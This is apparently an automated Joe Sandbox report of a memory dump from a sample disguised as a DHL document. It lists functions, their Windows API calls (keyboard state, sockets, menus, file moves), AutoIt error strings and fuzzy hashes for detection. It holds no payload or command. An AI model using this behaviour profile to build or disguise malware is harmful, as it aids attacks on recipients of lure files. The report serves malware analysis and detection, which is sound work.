
Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f7b1e22bf02c80a97ce6770f020469da65776178a5433dd30202eb623ea0ab61
Instruction ID: 0f7f51e3b2c75db0f8b30d8af803a83c0869b061eaca891c0298576a7f188188
Opcode Fuzzy Hash: f7b1e22bf02c80a97ce6770f020469da65776178a5433dd30202eb623ea0ab61
Instruction Fuzzy Hash: 6C412631208680FAC7398B29DC8C7BA7B96AF56318F15403CF18762560C772A883CB11

Function 00232D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00232D1B
GetDC.USER32(00000000), ref: 00232D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00232D2E
ReleaseDC.USER32(00000000,00000000), ref: 00232D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00232D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00232D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00235A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00232DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00232DE1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ca0b9e1264b649b14156b4ee154814907270bbdd4599a73b800f9c8f2e96690b
Instruction ID: 09fec3d2366d09ff650106a74a9c74ecc5f98f4aa1a6ce99a7338706cc73e4a7
Opcode Fuzzy Hash: ca0b9e1264b649b14156b4ee154814907270bbdd4599a73b800f9c8f2e96690b
Instruction Fuzzy Hash: EC31AE72211214BFEB258F50DC8AFEB3FADEF49711F144055FE08AA291C6759C50CBA0

Function 00205622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00205637
_memcmp.LIBVCRUNTIME ref: 00205659
_memcmp.LIBVCRUNTIME ref: 00205671
_memcmp.LIBVCRUNTIME ref: 00205684
_memcmp.LIBVCRUNTIME ref: 0020569E
_memcmp.LIBVCRUNTIME ref: 002056B1
_memcmp.LIBVCRUNTIME ref: 002056C9
_memcmp.LIBVCRUNTIME ref: 002056E4

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 995c194ab7f3eb8bed1fdb9fdf75b667fb638843982103253444986298349a0c
Instruction ID: a49f42d87595ae2cf6ee22e9bd23f04d0b913d500bd576fd28e90844442d4c2d
Opcode Fuzzy Hash: 995c194ab7f3eb8bed1fdb9fdf75b667fb638843982103253444986298349a0c
Instruction Fuzzy Hash: 2821F8A1AB0B6A77D31499109F82FBB635DBE32398F441025FD045A5C3F762ED308DA5

Function 00224FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00225007
NULL Pointer assignment, xrefs: 0022502E, 00225383

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 802306869b1b8e70a9ec86676d8244f9b1e8405df1591336af28fc31ad65ec83
Instruction ID: 65787fa3d0c59ed55e717e6a1f5a693df3ce2cbe8f04e392ec50d042b64242ef
Opcode Fuzzy Hash: 802306869b1b8e70a9ec86676d8244f9b1e8405df1591336af28fc31ad65ec83
Instruction Fuzzy Hash: 19D1C471A1062AAFDF10CF98E880BAEB7B5FF48344F14C169E915AB281E770DD51CB90

Function 001E1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001E17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001E15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001E1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001E17FB,?,001E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001E16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001E16FB

Part of subcall function 001D3820: RtlAllocateHeap.NTDLL(00000000,?,00271444,?,001BFDF5,?,?,001AA976,00000010,00271440,001A13FC,?,001A13C6,?,001A1129), ref: 001D3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001E1777
__freea.LIBCMT ref: 001E17A2
__freea.LIBCMT ref: 001E17AE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 261cd858d101c2eb1b782df3cecd4ff33449babd2a7177db2a690c776e27b499
Instruction ID: a7e69e4602aeaa7753aebd9863442574cc88a02e3f7f5840d1e8c058186633af
Opcode Fuzzy Hash: 261cd858d101c2eb1b782df3cecd4ff33449babd2a7177db2a690c776e27b499
Instruction Fuzzy Hash: 3F91D672E00A96BADF248FB6C881EEE7BB5AF4A710F184659E912E7140D735CD40CB60

Function 00224523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00224648
VariantInit.OLEAUT32(?), ref: 00224749
VariantClear.OLEAUT32(?), ref: 00224753
VariantClear.OLEAUT32(?), ref: 002247B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0022472C
Null Object assignment in FOR..IN loop, xrefs: 002245D8, 00224706, 002247BE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 66c2f8c96e80eb4d398de5a7add9009f82bd6c4ad83a2683c59118402630b21f
Instruction ID: a5f78a023e6e56d5ac158c9fbc26aa0e0ee5169e45f132881d1270c43f6a27f5
Opcode Fuzzy Hash: 66c2f8c96e80eb4d398de5a7add9009f82bd6c4ad83a2683c59118402630b21f
Instruction Fuzzy Hash: 0B91A170A20225BBDF24DFA4E844FAEBBB8EF46714F108559F515AB280D7B09951CFA0

Function 00211187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0021125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00211284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002112A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002112D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0021135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002113C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00211430

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 40efa6243b10e2810f6a8220009bc44e47c2bacf3b51b571e3f8422507d5a0b1
Instruction ID: edd2484898eb2076ee2f5c8dfc9df5c5f7c222951430541fed892d168b200849
Opcode Fuzzy Hash: 40efa6243b10e2810f6a8220009bc44e47c2bacf3b51b571e3f8422507d5a0b1
Instruction Fuzzy Hash: 1E911375A10219AFEB00DFA8D884BFEB7F5FF65714F104029EA00E7291D774A9A1CB90

Function 001B948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ddee39f265c94e06df2c5dcea781766cae7810ef044797300c2301fc94930fbf
Instruction ID: daf8b694e6b97e20112829c028bed4ea6828c725ef3fe0b268616a5a02f360a7
Opcode Fuzzy Hash: ddee39f265c94e06df2c5dcea781766cae7810ef044797300c2301fc94930fbf
Instruction Fuzzy Hash: 55914A71D40219EFCB14CFA9CC88AEEBBB8FF49320F144156E615B7291D374AA42CB60

Function 00223947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0022396B
CharUpperBuffW.USER32(?,?), ref: 00223A7A
_wcslen.LIBCMT ref: 00223A8A
VariantClear.OLEAUT32(?), ref: 00223C1F

Part of subcall function 00210CDF: VariantInit.OLEAUT32(00000000), ref: 00210D1F
Part of subcall function 00210CDF: VariantCopy.OLEAUT32(?,?), ref: 00210D28
Part of subcall function 00210CDF: VariantClear.OLEAUT32(?), ref: 00210D34

Strings

AUTOIT.ERROR, xrefs: 00223A80, 00223A85
Incorrect Parameter format, xrefs: 002239A6, 00223BA1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: f6d5b7b2d7a2dcee899e135055010b40743bdd243cd96e9df3b8e358b139fcff
Instruction ID: 9c551da3d9ab61de50e6b2231fb9c67ec8e50604a6877ec9002237e535f78dc5
Opcode Fuzzy Hash: f6d5b7b2d7a2dcee899e135055010b40743bdd243cd96e9df3b8e358b139fcff
Instruction Fuzzy Hash: 8E917774A18315AFC700EF64D48096AB7E4FF99314F14882EF88A9B351DB34EE55CB92

Function 00224BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0020000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?,?,0020035E), ref: 0020002B
Part of subcall function 0020000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?), ref: 00200046
Part of subcall function 0020000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?), ref: 00200054
Part of subcall function 0020000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?), ref: 00200064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00224C51
_wcslen.LIBCMT ref: 00224D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00224DCF
CoTaskMemFree.OLE32(?), ref: 00224DDA

Strings

NULL Pointer assignment, xrefs: 00224E23, 00224E52

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 4b19cb483c4150b2e763774e7a2c6155fed0e5543dd88d8e93c16e7e65750303
Instruction ID: ac4119267938a6947fbf8b212b66678b2a05e5acc7ae7b80fd95d98f5a5910f7
Opcode Fuzzy Hash: 4b19cb483c4150b2e763774e7a2c6155fed0e5543dd88d8e93c16e7e65750303
Instruction Fuzzy Hash: E3913871D1022DAFDF15EFE4D880AEEB7B9BF08304F10816AE915AB251DB749A54CF60

Function 002320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00232183
GetMenuItemCount.USER32(00000000), ref: 002321B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002321DD
_wcslen.LIBCMT ref: 00232213
GetMenuItemID.USER32(?,?), ref: 0023224D
GetSubMenu.USER32(?,?), ref: 0023225B

Part of subcall function 00203A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00203A57
Part of subcall function 00203A3D: GetCurrentThreadId.KERNEL32 ref: 00203A5E
Part of subcall function 00203A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002025B3), ref: 00203A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002322E3

Part of subcall function 0020E97B: Sleep.KERNEL32 ref: 0020E9F3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: fdee224992c8da9ae97a04ad3f0cac51e4e1bf9f6220e609ab051cd39a47c187
Instruction ID: b38af5441f6f6738993af15248de20a788dc8502ad89afe1d8ed2f9e6588a4da
Opcode Fuzzy Hash: fdee224992c8da9ae97a04ad3f0cac51e4e1bf9f6220e609ab051cd39a47c187
Instruction Fuzzy Hash: F4718CB5A10205EFCB10EF68C885AAEB7F5EF48310F108459E956BB351DB34EE558B90

Function 0020AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0020AEF9
GetKeyboardState.USER32(?), ref: 0020AF0E
SetKeyboardState.USER32(?), ref: 0020AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0020AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0020AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0020AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0020B020

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d21b5344bd1a2d2b5a98f0cedb786643a1379857d29c4680bbe1ddc42f1d453d
Instruction ID: 06bde4ab9ec79db26d8962c1dadd68855736f9b96754a925e46aed69bf6c8f62
Opcode Fuzzy Hash: d21b5344bd1a2d2b5a98f0cedb786643a1379857d29c4680bbe1ddc42f1d453d
Instruction Fuzzy Hash: FE51B1A0A247D73DFB378734C849BBABEA95B06304F088589E1D9958C3C3D9A8E4D751

Function 0020ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0020AD19
GetKeyboardState.USER32(?), ref: 0020AD2E
SetKeyboardState.USER32(?), ref: 0020AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0020ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0020ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0020AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0020AE38

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9e64ffc5f23c9ef9d8493799abdb258b828808051984dcc6fa3c785c9d726851
Instruction ID: 1826eea7ffc51a825084b1ccab143e4f158ccc24db764e8646581a3d156f2c35
Opcode Fuzzy Hash: 9e64ffc5f23c9ef9d8493799abdb258b828808051984dcc6fa3c785c9d726851
Instruction Fuzzy Hash: 475129A19247D23DFB378B34CC46B7A7EE86B46300F488499E1D5568C3D394ECA8D752

Function 001D542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(001E3CD6,?,?,?,?,?,?,?,?,001D5BA3,?,?,001E3CD6,?,?), ref: 001D5470
__fassign.LIBCMT ref: 001D54EB
__fassign.LIBCMT ref: 001D5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,001E3CD6,00000005,00000000,00000000), ref: 001D552C
WriteFile.KERNEL32(?,001E3CD6,00000000,001D5BA3,00000000,?,?,?,?,?,?,?,?,?,001D5BA3,?), ref: 001D554B
WriteFile.KERNEL32(?,?,00000001,001D5BA3,00000000,?,?,?,?,?,?,?,?,?,001D5BA3,?), ref: 001D5584

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 9568c6054c607eed77334cce2c97e4f45be50e0c249f3cb745b6816502d3c351
Instruction ID: 0694b93f22d235f8ae1da6278b966c4405932f620e0f8725c88288b39dad5c1f
Opcode Fuzzy Hash: 9568c6054c607eed77334cce2c97e4f45be50e0c249f3cb745b6816502d3c351
Instruction Fuzzy Hash: A451A3719006499FDB11CFA8E885AEEBBFAEF09300F14415BE555E7391D730DA41CB61

Function 001C2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001C2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 001C2D53
_ValidateLocalCookies.LIBCMT ref: 001C2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 001C2E0C
_ValidateLocalCookies.LIBCMT ref: 001C2E61

Strings

csm, xrefs: 001C2DF6

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e7674fb35dcbb9b662c7f024650dad4871c7519cafa6425d4eb069d7bdc0cdba
Instruction ID: 5675f46e842f53df3dca9693fc3db633021293df73805e3236005f3a94acbb21
Opcode Fuzzy Hash: e7674fb35dcbb9b662c7f024650dad4871c7519cafa6425d4eb069d7bdc0cdba
Instruction Fuzzy Hash: 6041D334A00209ABCF14DFA8C845FAEBBB4BF65324F148159E9156B392D731DA01CBD1

Function 002210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0022304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0022307A
Part of subcall function 0022304E: _wcslen.LIBCMT ref: 0022309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00221112
WSAGetLastError.WSOCK32 ref: 00221121
WSAGetLastError.WSOCK32 ref: 002211C9
closesocket.WSOCK32(00000000), ref: 002211F9

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 1d7da383248763e7c02168dae7b6949ef04511fe9054e4a717f51ef3a19d6633
Instruction ID: ac48b488d1aed1251eb3caee900e23345fcd03231482c0d9d4a3b44ff081cab4
Opcode Fuzzy Hash: 1d7da383248763e7c02168dae7b6949ef04511fe9054e4a717f51ef3a19d6633
Instruction Fuzzy Hash: 38412735610214AFDB109F64E884FA9B7E9FF55324F148059FD09AB291C770EE61CBE1

Function 0020CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0020DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0020CF22,?), ref: 0020DDFD

Part of subcall function 0020DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0020CF22,?), ref: 0020DE16

lstrcmpiW.KERNEL32(?,?), ref: 0020CF45
MoveFileW.KERNEL32(?,?), ref: 0020CF7F
_wcslen.LIBCMT ref: 0020D005
